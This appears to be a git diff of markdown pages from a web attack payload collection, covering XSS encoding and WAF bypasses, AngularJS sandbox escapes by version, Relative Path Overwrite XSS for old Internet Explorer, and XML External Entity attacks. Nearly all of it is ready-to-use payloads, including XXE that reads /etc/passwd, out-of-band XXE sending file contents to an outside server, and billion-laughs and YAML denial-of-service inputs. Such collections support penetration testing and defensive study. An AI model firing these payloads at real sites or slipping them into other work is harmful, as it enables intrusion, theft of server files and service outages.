||||
'te' / alert('/') / 'xt';
|
||||
@ -521,22 +566,25 @@ Bypass ';' using another character
|
||||
```
|
||||
|
||||
Bypass using HTML encoding
|
||||
|
||||
```javascript
|
||||
%26%2397;lert(1)
|
||||
```
|
||||
|
||||
Bypass using Katakana (https://github.com/aemkei/katakana.js)
|
||||
|
||||
```javascript
|
||||
javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()
|
||||
```
|
||||
|
||||
Bypass using Octal encoding
|
||||
|
||||
```javascript
|
||||
javascript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76'
|
||||
```
|
||||
|
||||
|
||||
Bypass using Unicode
|
||||
|
||||
```javascript
|
||||
Unicode character U+FF1C FULLWIDTH LESSTHAN SIGN (encoded as %EF%BC%9C) was
|
||||
transformed into U+003C LESSTHAN SIGN (<)
|
||||
@ -562,6 +610,7 @@ E.g : http://www.example.net/something%CA%BA%EF%BC%9E%EF%BC%9Csvg%20onload=alert
|
||||
```
|
||||
|
||||
Bypass using Unicode converted to uppercase
|
||||
|
||||
```javascript
|
||||
İ (%c4%b0).toLowerCase() => i
|
||||
ı (%c4%b1).toUpperCase() => I
|
||||
@ -573,6 +622,7 @@ Bypass using Unicode converted to uppercase
|
||||
```
|
||||
|
||||
Bypass using overlong UTF-8
|
||||
|
||||
```javascript
|
||||
< = %C0%BC = %E0%80%BC = %F0%80%80%BC
|
||||
> = %C0%BE = %E0%80%BE = %F0%80%80%BE
|
||||
@ -583,23 +633,27 @@ Bypass using overlong UTF-8
|
||||
```
|
||||
|
||||
Bypass using UTF-7
|
||||
|
||||
```javascript
|
||||
+ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-
|
||||
```
|
||||
|
||||
Bypass using UTF-16be
|
||||
|
||||
```javascript
|
||||
%00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E%00
|
||||
\x00<\x00s\x00v\x00g\x00/\x00o\x00n\x00l\x00o\x00a\x00d\x00=\x00a\x00l\x00e\x00r\x00t\x00(\x00)\x00>
|
||||
```
|
||||
|
||||
Bypass using UTF-32
|
||||
|
||||
```js
|
||||
%00%00%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E
|
||||
```
|
||||
|
||||
Bypass using BOM - Byte Order Mark (The page must begin with the BOM character.)
|
||||
BOM character allows you to override charset of the page
|
||||
|
||||
```js
|
||||
BOM Character for UTF-16 Encoding:
|
||||
Big Endian : 0xFE 0xFF
|
||||
@ -614,11 +668,13 @@ XSS : %00%00%fe%ff%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o
|
||||
|
||||
Bypass CSP using JSONP from Google (Trick by [@apfeifer27](https://twitter.com/apfeifer27))
|
||||
//google.com/complete/search?client=chrome&jsonp=alert(1);
|
||||
|
||||
```js
|
||||
<script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>"
|
||||
```
|
||||
|
||||
Bypass using weird encoding or native interpretation to hide the payload (alert())
|
||||
|
||||
```javascript
|
||||
<script>\u0061\u006C\u0065\u0072\u0074(1)</script>
|
||||
<img src="1" onerror="alert(1)" />
|
||||
@ -628,6 +684,7 @@ Bypass using weird encoding or native interpretation to hide the payload (alert(
|
||||
```
|
||||
|
||||
Exotic payloads
|
||||
|
||||
```javascript
|
||||
<img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
|
||||
<script>$=1,alert($)</script>
|
||||
@ -645,12 +702,15 @@ Exotic payloads
|
||||
## Common WAF Bypass
|
||||
|
||||
### Chrome Auditor - 9th august
|
||||
|
||||
```javascript
|
||||
</script><svg><script>alert(1)-%26apos%3B
|
||||
```
|
||||
|
||||
Live example by @brutelogic - [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?c1=</script><svg><script>alert(1)-%26apos%3B)
|
||||
|
||||
### Incapsula WAF Bypass - 8th march
|
||||
|
||||
```javascript
|
||||
anythinglr00</script><script>alert(document.domain)</script>uxldz
|
||||
|
||||
@ -658,31 +718,34 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld
|
||||
```
|
||||
|
||||
### Akamai WAF bypass by @zseano - 18th june
|
||||
|
||||
```javascript
|
||||
?"></script><base%20c%3D=href%3Dhttps:\mysite>
|
||||
```
|
||||
|
||||
## More fun ?
|
||||
This section will be used for the "fun/interesting/useless" stuff.
|
||||
|
||||
Use notification box instead of an alert - by [@brutelogic](https://twitter.com/brutelogic)
|
||||
This section will be used for the "fun/interesting/useless" stuff.
|
||||
|
||||
Use notification box instead of an alert - by [@brutelogic](https://twitter.com/brutelogic)
|
||||
Note : it requires user permission
|
||||
```
|
||||
|
||||
```javascript
|
||||
Notification.requestPermission(x=>{new(Notification)(1)})
|
||||
```
|
||||
|
||||
Try here : [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?c3=%27;Notification.requestPermission(x=>%7Bnew(Notification)(1)%7D)//)
|
||||
|
||||
|
||||
## Thanks to
|
||||
* https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
|
||||
* tbm
|
||||
* http://infinite8security.blogspot.com/2016/02/welcome-readers-as-i-promised-this-post.html
|
||||
* http://www.thespanner.co.uk/2014/03/21/rpo/
|
||||
* http://blog.innerht.ml/rpo-gadgets/
|
||||
* http://support.detectify.com/customer/portal/articles/2088351-relative-path-overwrite
|
||||
* http://d3adend.org/xss/ghettoBypass
|
||||
* http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html
|
||||
* http://blog.rakeshmane.com/2017/08/xssing-web-part-2.html
|
||||
* https://medium.com/@tbmnull/making-an-xss-triggered-by-csp-bypass-on-twitter-561f107be3e5
|
||||
* https://gist.github.com/tomnomnom/14a918f707ef0685fdebd90545580309
|
||||
|
||||
- [Unleashing-an-Ultimate-XSS-Polyglot](https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot)
|
||||
- tbm
|
||||
- [(Relative Path Overwrite) RPO XSS - Infinite Security](http://infinite8security.blogspot.com/2016/02/welcome-readers-as-i-promised-this-post.html)
|
||||
- [RPO TheSpanner](http://www.thespanner.co.uk/2014/03/21/rpo/)
|
||||
- [RPO Gadget - innerthmtl](http://blog.innerht.ml/rpo-gadgets/)
|
||||
- http://support.detectify.com/customer/portal/articles/2088351-relative-path-overwrite
|
||||
- http://d3adend.org/xss/ghettoBypass
|
||||
- http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html
|
||||
- http://blog.rakeshmane.com/2017/08/xssing-web-part-2.html
|
||||
- https://medium.com/@tbmnull/making-an-xss-triggered-by-csp-bypass-on-twitter-561f107be3e5
|
||||
- https://gist.github.com/tomnomnom/14a918f707ef0685fdebd90545580309
|
||||
|
@ -1,11 +1,14 @@
|
||||
## XSS in Angular
|
||||
# XSS in Angular
|
||||
|
||||
Angular 1.6.0
|
||||
```
|
||||
|
||||
```javascript
|
||||
{{0[a='constructor'][a]('alert(1)')()}}
|
||||
```
|
||||
|
||||
Angular 1.5.9
|
||||
```
|
||||
|
||||
```javascript
|
||||
{{
|
||||
c=''.sub.call;b=''.sub.bind;a=''.sub.apply;
|
||||
c.$apply=$apply;c.$eval=b;op=$root.$$phase;
|
||||
@ -23,22 +26,26 @@ Angular 1.5.9
|
||||
```
|
||||
|
||||
Angular 1.5.0 - 1.5.8
|
||||
```
|
||||
|
||||
```javascript
|
||||
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
|
||||
```
|
||||
|
||||
Angular 1.4.0 - 1.4.9
|
||||
```
|
||||
|
||||
```javascript
|
||||
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
|
||||
```
|
||||
|
||||
Angular 1.3.20
|
||||
```
|
||||
|
||||
```javascript
|
||||
{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
|
||||
```
|
||||
|
||||
Angular 1.3.19
|
||||
```
|
||||
|
||||
```javascript
|
||||
{{
|
||||
'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;
|
||||
$eval('x=alert(1)//');
|
||||
@ -46,14 +53,16 @@ Angular 1.3.19
|
||||
```
|
||||
|
||||
Angular 1.3.3 - 1.3.18
|
||||
```
|
||||
|
||||
```javascript
|
||||
{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
|
||||
'a'.constructor.prototype.charAt=[].join;
|
||||
$eval('x=alert(1)//'); }}
|
||||
```
|
||||
|
||||
Angular 1.3.1 - 1.3.2
|
||||
```
|
||||
|
||||
```javascript
|
||||
{{
|
||||
{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
|
||||
'a'.constructor.prototype.charAt=''.valueOf;
|
||||
@ -62,7 +71,8 @@ Angular 1.3.1 - 1.3.2
|
||||
```
|
||||
|
||||
Angular 1.3.0
|
||||
```
|
||||
|
||||
```javascript
|
||||
{{!ready && (ready = true) && (
|
||||
!call
|
||||
? $$watchers[0].get(toString.constructor.prototype)
|
||||
@ -80,31 +90,37 @@ Angular 1.3.0
|
||||
```
|
||||
|
||||
Angular 1.2.24 - 1.2.29
|
||||
```
|
||||
|
||||
```javascript
|
||||
{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}
|
||||
```
|
||||
|
||||
Angular 1.2.19 - 1.2.23
|
||||
```
|
||||
|
||||
```javascript
|
||||
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
|
||||
```
|
||||
|
||||
Angular 1.2.6 - 1.2.18
|
||||
```
|
||||
|
||||
```javascript
|
||||
{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
|
||||
```
|
||||
|
||||
Angular 1.2.2 - 1.2.5
|
||||
```
|
||||
|
||||
```javascript
|
||||
{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}
|
||||
```
|
||||
|
||||
Angular 1.2.0 - 1.2.1
|
||||
```
|
||||
|
||||
```javascript
|
||||
{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
|
||||
```
|
||||
|
||||
Angular 1.0.1 - 1.1.5
|
||||
```
|
||||
|
||||
```javascript
|
||||
{{constructor.constructor('alert(1)')()}}
|
||||
```
|
||||
|
@ -1,15 +1,16 @@
|
||||
## XSS with Relative Path Overwrite - IE 8/9 and lower
|
||||
# XSS with Relative Path Overwrite - IE 8/9 and lower
|
||||
|
||||
You need these 3 components
|
||||
```
|
||||
|
||||
```javascript
|
||||
1) stored XSS that allows CSS injection. : {}*{xss:expression(open(alert(1)))}
|
||||
2) URL Rewriting.
|
||||
3) Relative addressing to CSS style sheet : ../style.css
|
||||
|
||||
```
|
||||
|
||||
A little example
|
||||
```
|
||||
|
||||
```html
|
||||
http://url.example.com/index.php/[RELATIVE_URL_INSERTED_HERE]
|
||||
<html>
|
||||
<head>
|
||||
@ -23,23 +24,21 @@ Stored XSS with CSS injection - Hello {}*{xss:expression(open(alert(1)))}
|
||||
```
|
||||
|
||||
Explanation of the vulnerability
|
||||
```
|
||||
The Meta element forces IE’s document mode into IE7 compat which is required to execute expressions. Our persistent text {}*{xss:expression(open(alert(1)))is included on the page and in a realistic scenario it would be a profile page or maybe a shared status update which is viewable by other users. We use “open” to prevent client side DoS with repeated executions of alert.
|
||||
|
||||
A simple request of “rpo.php/” makes the relative style load the page itself as a style sheet. The actual request is “/labs/xss_horror_show/chapter7/rpo.php/styles.css” the browser thinks there’s another directory but the actual request is being sent to the document and that in essence is how an RPO attack works.
|
||||
> The Meta element forces IE’s document mode into IE7 compat which is required to execute expressions. Our persistent text {}*{xss:expression(open(alert(1)))is included on the page and in a realistic scenario it would be a profile page or maybe a shared status update which is viewable by other users. We use “open” to prevent client side DoS with repeated executions of alert.
|
||||
> A simple request of “rpo.php/” makes the relative style load the page itself as a style sheet. The actual request is “/labs/xss_horror_show/chapter7/rpo.php/styles.css” the browser thinks there’s another directory but the actual request is being sent to the document and that in essence is how an RPO attack works.
|
||||
|
||||
Demo 1 at http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo.php
|
||||
Demo 2 at http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo2.php/fakedirectory/fakedirectory2/fakedirectory3
|
||||
MultiBrowser : http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo3.php
|
||||
|
||||
|
||||
From : http://www.thespanner.co.uk/2014/03/21/rpo/
|
||||
```
|
||||
Demo 1 at `http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo.php`
|
||||
Demo 2 at `http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo2.php/fakedirectory/fakedirectory2/fakedirectory3`
|
||||
MultiBrowser : `http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo3.php`
|
||||
|
||||
From : `http://www.thespanner.co.uk/2014/03/21/rpo/`
|
||||
|
||||
## Mutated XSS for Browser IE8/IE9
|
||||
```
|
||||
|
||||
```javascript
|
||||
<listing id=x><img src=1 onerror=alert(1)></listing>
|
||||
<script>alert(document.getElementById('x').innerHTML)</script>
|
||||
```
|
||||
IE will read and write (decode) HTML multiple time and attackers XSS payload will mutate and execute.
|
||||
|
||||
IE will read and write (decode) HTML multiple time and attackers XSS payload will mutate and execute.
|
||||
|
@ -1,10 +1,12 @@
|
||||
# XML External Entity
|
||||
|
||||
An XML External Entity attack is a type of attack against an application that parses XML input
|
||||
|
||||
## Exploit
|
||||
|
||||
Basic Test
|
||||
```
|
||||
|
||||
```xml
|
||||
<!--?xml version="1.0" ?-->
|
||||
<!DOCTYPE replace [<!ENTITY example "Doe"> ]>
|
||||
<userInfo>
|
||||
@ -14,8 +16,10 @@ Basic Test
|
||||
```
|
||||
|
||||
## Basic XXE
|
||||
|
||||
Classic XXE
|
||||
```
|
||||
|
||||
```xml
|
||||
<?xml version="1.0"?>
|
||||
<!DOCTYPE data [
|
||||
<!ELEMENT data (#ANY)>
|
||||
@ -24,28 +28,29 @@ Classic XXE
|
||||
<data>&file;</data>
|
||||
```
|
||||
|
||||
```
|
||||
```xml
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?>
|
||||
<!DOCTYPE foo [
|
||||
<!ELEMENT foo ANY >
|
||||
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
|
||||
```
|
||||
|
||||
```
|
||||
```xml
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?>
|
||||
<!DOCTYPE foo [
|
||||
<!ELEMENT foo ANY >
|
||||
<!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>
|
||||
```
|
||||
|
||||
|
||||
Classic XXE Base64 encoded
|
||||
```
|
||||
|
||||
```xml
|
||||
<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>
|
||||
```
|
||||
|
||||
## PHP Wrapper inside XXE
|
||||
```
|
||||
|
||||
```xml
|
||||
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
|
||||
<contacts>
|
||||
<contact>
|
||||
@ -58,7 +63,7 @@ Classic XXE Base64 encoded
|
||||
</contacts>
|
||||
```
|
||||
|
||||
```
|
||||
```xml
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?>
|
||||
<!DOCTYPE foo [
|
||||
<!ELEMENT foo ANY >
|
||||
@ -67,10 +72,11 @@ Classic XXE Base64 encoded
|
||||
<foo>&xxe;</foo>
|
||||
```
|
||||
|
||||
|
||||
## Deny of service
|
||||
|
||||
Deny Of Service - Billion Laugh Attack
|
||||
```
|
||||
|
||||
```xml
|
||||
<!DOCTYPE data [
|
||||
<!ENTITY a0 "dos" >
|
||||
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
|
||||
@ -82,7 +88,8 @@ Deny Of Service - Billion Laugh Attack
|
||||
```
|
||||
|
||||
Yaml attack
|
||||
```
|
||||
|
||||
```xml
|
||||
a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]
|
||||
b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
|
||||
c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
|
||||
@ -95,8 +102,10 @@ i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
|
||||
```
|
||||
|
||||
## Blind XXE
|
||||
|
||||
Blind XXE
|
||||
```
|
||||
|
||||
```xml
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?>
|
||||
<!DOCTYPE foo [
|
||||
<!ELEMENT foo ANY >
|
||||
@ -107,9 +116,9 @@ Blind XXE
|
||||
<foo>&callhome;</foo>
|
||||
```
|
||||
|
||||
|
||||
XXE OOB Attack (Yunusov, 2013)
|
||||
```
|
||||
|
||||
```xml
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_oob.dtd">
|
||||
<data>&send;</data>
|
||||
@ -121,7 +130,8 @@ File stored on http://publicServer.com/parameterEntity_oob.dtd
|
||||
```
|
||||
|
||||
XXE OOB with DTD and PHP filter
|
||||
```
|
||||
|
||||
```xml
|
||||
<?xml version="1.0" ?>
|
||||
<!DOCTYPE r [
|
||||
<!ELEMENT r ANY >
|
||||
@ -137,13 +147,14 @@ File stored on http://127.0.0.1/dtd.xml
|
||||
```
|
||||
|
||||
XXE Inside SOAP
|
||||
```
|
||||
|
||||
```xml
|
||||
<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>
|
||||
```
|
||||
|
||||
|
||||
## Thanks to
|
||||
* https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
|
||||
* http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html
|
||||
* https://gist.github.com/staaldraad/01415b990939494879b4
|
||||
* https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870
|
||||
|
||||
* [XML External Entity (XXE) Processing - OWASP](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing)
|
||||
* [Detecting and exploiting XXE in SAML Interfaces - Von Christian Mainka](http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html)
|
||||
* [staaldraad - XXE payloads](https://gist.github.com/staaldraad/01415b990939494879b4)
|
||||
* [mgeeky - XML attacks](https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870)
|
||||
|
Loading…
Reference in New Issue
Block a user